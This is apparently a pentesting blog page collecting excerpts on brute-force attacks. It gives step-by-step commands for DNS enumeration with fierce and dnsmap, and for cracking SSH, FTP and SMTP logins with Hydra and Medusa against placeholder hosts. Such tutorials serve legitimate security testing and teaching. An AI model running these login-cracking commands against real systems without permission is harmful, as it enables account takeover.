The brute-force attack is still one of the most popular password cracking methods. However, it is not limited to password cracking: brute-force attacks can also be used to discover hidden pages and content in a web application. The attack is basically "hit and try" until you succeed. This attack sometimes takes longer, but… Read more: Popular Tools for Brute-force Attack
> Open your BackTrack or Kali Linux
> Open terminal
> Change directory: cd /pentest/enumeration/dns/fierce
> Run fierce: ./fierce.pl -dns mydomain.com

> Open your BackTrack 5 or Kali Linux
> Change directory: cd /pentest/enumeration/dns/dnsmap/

Usage
    ./dnsmap [target_domain] [options]

Options
    -w wordlist-file
    -r regular-results-file
    -c csv-results-file
    -d delay-millisecs
    -i ips-to-ignore

Examples
    dnsmap mydomain.com
    dnsmap mydomain. -w my_subdomain_wordlist.txt -r /root/myresults/results.txt
    dnsmap mydomain. -r /root/myresults/ -d 3000
    dnsmap mydomain. -c /root/myresults/results.csv

We are going to use Hydra to crack SSH.

1. Check if the SSH port is open (default 22):
    nmap -sT -Pn -n -p22 192.168.1.5
2. Try to connect:
    ssh 192.168.1.5
3. Cracking:
    hydra -l root -P mypasslist.lst 192.168.1.5 ssh
4. If step 3 ended successfully, try to connect again.

THC-Hydra – A very fast network logon cracker which supports many different services. See the feature sets and services coverage page, incl. a speed comparison against ncrack and medusa. Simple Mail Transfer Protocol (SMTP) is an Internet standard for electronic mail (e-mail) transmission across Internet Protocol (IP) networks. SMTP was first defined by RFC 821… Read more: Brute Forcing smtp with Hydra
Hydra is a very fast network logon cracker which supports many different services.

FTP:
    hydra -l root -P passwordslist.txt -e ns -f -t 2 -vV x.x.x.x ftp

    -l root                try to log in with the username root
    -P passwordslist.txt   load passwords from the file passwordslist.txt
    -e ns                  try a null password and also try the login as the password (root)
    -f…

Read more: Crack FTP passwords – Bruteforcing

Assuming you have Medusa installed (it comes preinstalled with BackTrack and other security distros) and you have a dictionary file, use the following syntax:

Code:
    medusa -h <host> -u <target-account> -P <password-file> -M ssh -e n -O output

Then simply open 'output' and look to see if it managed. -e n means medusa will… Read more: Bruteforcing SSH with Medusa tutorial